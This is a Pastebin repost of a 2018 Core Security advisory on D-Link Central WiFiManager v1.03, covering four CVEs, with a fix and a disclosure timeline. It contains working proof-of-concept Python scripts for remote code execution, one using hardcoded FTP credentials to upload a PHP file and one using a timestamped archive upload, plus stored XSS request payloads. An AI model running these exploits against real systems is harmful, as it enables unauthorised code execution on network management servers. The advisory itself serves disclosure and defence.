SHARE
TWEET

[D-LINK CENTRAL WIFI MANAGER] [MULTIPLE VURN]

xB4ckdoorREAL Nov 7th, 2018 (edited) 159 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
  2.  #discord: https://discord.gg/QDy3bUy or skype: b4ckdoor.porn
  3. 1. *Advisory Information*
  4.  
  5. Title: D-Link Central WiFiManager Software Controller Multiple
  6. Vulnerabilities
  7. Advisory ID: CORE-2018-0010
  8. Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
  9. Date published: 2018-10-04
  10. Date of last update: 2018-10-04
  11. Vendors contacted: D-Link
  12. Release mode: Coordinated release
  13.  
  14. 2. *Vulnerability Information*
  15.  
  16. Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
  17. Improper Authorization [CWE-285], Improper Neutralization of Input
  18. During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
  19. Neutralization of Input During Web Page Generation
  20. ('Cross-site Scripting') [CWE-79]
  21. Impact: Code execution
  22. Remotely Exploitable: Yes
  23. Locally Exploitable: Yes
  24. CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
  25.  
  26. 3. *Vulnerability Description*
  27.  
  28. D-Link's website states that:
  29.  
  30. [1] Central WiFiManager Software Controller helps network administrators
  31. streamline their wireless access point (AP) management workflow. Central
  32. WiFiManager is an innovative approach to the more traditional
  33. hardware-based multiple access point management system. It uses a
  34. centralized server to both remotely manage and monitor wireless APs on a
  35. network.
  36.  
  37. Vulnerabilities were found in the Central WiFiManager Software
  38. Controller, allowing unauthenticated and authenticated file upload with
  39. dangerous type that could lead to remote code execution with system
  40. permissions. Also, two stored Cross Site Scripting vulnerabilities were
  41. found.
  42.  
  43. 4. *Vulnerable Packages*
  44.  
  45.     . Central WifiManager v1.03
  46.  
  47. Other products and versions might be affected, but they were not tested.
  48.  
  49. 5. *Vendor Information, Solutions and Workarounds*
  50.  
  51. D-Link released the following Beta version that addresses the reported vulnerabilities:
  52.  
  53.     . Central WifiManager v 1.03r0100-Beta1
  54.  
  55. In addition, D-Link published a security note in:
  56. https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
  57.  
  58. 6. *Credits*
  59.  
  60. These vulnerabilities were discovered and researched by Julian Munoz
  61. from Core Security Consulting Services. The publication of this advisory
  62. was coordinated by Leandro Cuozzo from Core Advisories Team.
  63.  
  64. 7. *Technical Description / Proof of Concept Code*
  65.  
  66. D-Link Central WiFiManager Software Controller exposes an FTP server
  67. that serves by default in port 9000 and has hardcoded credentials
  68. (admin, admin). Taking advantage of this fact, we will upload a PHP file
  69. in the '/web/public' directory and then, by requesting this file, will
  70. be able to execute arbitrary code on the target system (shown in 7.1).
  71.  
  72. On 7.2 we show a similar attack to but in this case with an
  73. authenticated user in the web application. The application has a
  74. functionality to upload a .rar file used for the captive portal
  75. displayed by the Access Points. We will craft a .rar with a PHP file
  76. that we will end up executing in the context of the web application.
  77. When the .rar is uploaded is stored in the path "\web\captivalportal" in
  78. a folder with a timestamp created by the PHP time() function. In order
  79. to know what is the web server's time we request an information file
  80. that contains the time we are looking for. After we have the server's
  81. time we upload the .rar, calculate the proper epoch and request the
  82. appropriate path increasing this epoch by one until we hit the correct
  83. one.
  84.  
  85. Finally, we discovered two Cross-Site Scripting, one on the update site
  86. functionality, in the 'sitename' parameter (7.3) and the other one on
  87. the creation of a local user in the 'username' parameter (7.4).
  88.  
  89. 7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
  90. File with Dangerous Type*
  91.  
  92. [CVE-2018-17440] The web application starts an FTP server running on the
  93. port 9000 by default with admin/admin credentials and do not show the
  94. option to change it, so in this POC we establish a connection with the
  95. server and upload a PHP file. Since the application do not restrict
  96. unauthenticated users to request any file in the web root, we later
  97. request the uploaded file to achieve remote code execution.
  98.  
  99. /-----
  100. import requests
  101. from ftplib import FTP
  102.  
  103. #stablish connection with FTP server
  104. host_ip = "127.0.0.1"
  105. ftp = FTP()
  106. ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000)
  107. ftp.login(<ftp://ftp.login(>"admin", "admin")
  108. data = []
  109.  
  110. #create PHP poc file
  111. poc_php_file = open("poc.php", "w+")
  112. poc_php_file.write("<?php\nsystem('whoami');\n?>")
  113. poc_php_file.close()
  114.  
  115. #upload PHP poc file
  116. php_file = open("poc.php", "rb")
  117. ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')>
  118. ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file)
  119. ftp.dir(data.append)<ftp://ftp.dir(data.append)>
  120. ftp.quit()<ftp://ftp.quit()>
  121.  
  122. for line in data:
  123.   print "-", line
  124.  
  125. session = requests.Session()
  126. session.trust_env = False
  127.  
  128. #get the uploaded file for remote code execution
  129. get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
  130.  
  131. print get_uploaded_file.text
  132. -----/
  133.  
  134. 7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*
  135.  
  136. [CVE-2018-17442] In this case we make a file upload using the
  137. functionality given by the onUploadLogPic endpoint, that will take a
  138. .rar file, decompress it and store it in a folder named after the PHP
  139. time() function. Our goal is first obtain the server's time, upload a
  140. .rar with our PHP file, calculate the proper epoch and iterate
  141. increasing it until we hit the proper one and remote code execution is
  142. achieved.
  143.  
  144. /-----
  145. import re
  146. import time
  147. import requests
  148. import datetime
  149. import tarfile
  150.  
  151. def parse_to_datetime(date_string):
  152.     date_list = date_string.split("-")
  153.     td = date_list[2][2:].split(":")
  154.     return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))
  155.  
  156. session = requests.Session()
  157. session.trust_env = False
  158. php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
  159. cookie = {'PHPSESSID': php_session_id}
  160.  
  161. #create tar file to upload.
  162. poc_php_file = open("poc.php", "w+")
  163. poc_php_file.write("<?php\nsystem('whoami');\n?>")
  164. poc_php_file.close()
  165.  
  166. poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
  167. poc_tar_file.add("poc.php")
  168. poc_tar_file.close()
  169.  
  170. #get server datetime.
  171. get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
  172.                                                   cookies=cookie, verify=False)
  173. date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
  174. #generate epoch from server's date
  175. epoch = int(time.mktime(parse_to_datetime(date).timetuple()))
  176.  
  177. #upload attack PHP file.
  178. attack_tar_file = "poc_tar_file.tar"
  179. tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
  180. restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
  181.                                        files=tar_file,
  182.                                        cookies=cookie, verify=False)
  183.  
  184. for i in range(0,20):
  185.     #get the uploaded file named after time epoch, returned by PHP time() function.
  186.     filename = str(epoch) + "/" + "poc.php"
  187.     get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
  188.     if get_uploaded_file.status_code == 200:
  189.         print "Remote Code Execution Achived"
  190.         print get_uploaded_file.text
  191.         break
  192.     epoch += 1
  193. -----/
  194.  
  195. 7.3. *Cross-Site Scripting in the application site name parameter*
  196.  
  197. [CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
  198. vulnerable to a stored Cross Site Scripting:
  199.  
  200. The following is a proof of concept to demonstrate the vulnerability:
  201.  
  202. /-----
  203. POST /index.php/Config/UpdateSite HTTP/1.1
  204. Host: 10.2.45.220
  205. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  206. Firefox/52.0
  207. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  208. Accept-Language: en-US,en;q=0.5
  209. Accept-Encoding: gzip, deflate
  210. Referer: https://10.2.45.220/index.php/Config/CreatSite
  211. Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
  212. PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
  213. Connection: close
  214. Upgrade-Insecure-Requests: 1
  215. Content-Type: application/x-www-form-urlencoded
  216. Content-Length: 66
  217.  
  218. siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
  219. -----/
  220.  
  221. 7.4. *Cross-Site Scripting in the creation of a new user*
  222.  
  223. [CVE-2018-17441] The 'username' parameter of the addUser endpoint is
  224. vulnerable to a stored Cross Site Scripting.
  225.  
  226. The following is a proof of concept to demonstrate the vulnerability:
  227.  
  228. /-----
  229. POST /index.php/System/addUser HTTP/1.1
  230. Host: 10.2.45.220
  231. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  232. Firefox/52.0
  233. Accept: */*
  234. Accept-Language: en-US,en;q=0.5
  235. Accept-Encoding: gzip, deflate
  236. Referer: https://10.2.45.220/index.php/System/userManager
  237. Content-Type: application/x-www-form-urlencoded;
  238. Content-Length: 96
  239. Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
  240. PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
  241. Connection: close
  242.  
  243. username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
  244. -----/
  245.  
  246. 8. *Report Timeline*
  247.  
  248. 2018-06-04: Core Security sent an initial notification to D-Link,
  249. including a draft advisory.
  250. 2018-06-06:D-Link confirmed the reception of the advisory and informed
  251. they will have an initial response on 06/08.
  252. 2018-06-08: D-Link informed that they would provide a schedule for the
  253. fixes on 06/13.
  254. 2018-06-08: Core Security thanked the update.
  255. 2018-06-14: D-Link informed its plan of remediation and notified Core
  256. Security that the fixed version will be available on 08/31.
  257. 2018-06-15: Core Security thanked the update and proposed to keep in
  258. regular contact until this tentative release date.
  259. 2018-07-23: Core Security requested a status update.
  260. 2018-07-25: D-Link answered saying that they are still targeting 08/31
  261. as the release date.
  262. 2018-08-24: Core Security requested a new status update and a solidified
  263. release date for the fixed version.
  264. 2018-08-28: D-Link sent a beta version for test.
  265. 2018-08-30: Core Security tested the beta version and requested D-Link
  266. to coordinate a release date.
  267. 2018-09-21: D-Link informed that they were planning a security
  268. announcement and they were ready to schedule a disclosure date.
  269. 2018-09-24: Core Security thanked the update and proposed October 4th as
  270. the publication date.
  271. 2018-10-04: Advisory CORE-2018-0010 published.
  272.  
  273.  
  274. #[2018-11-07]  #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top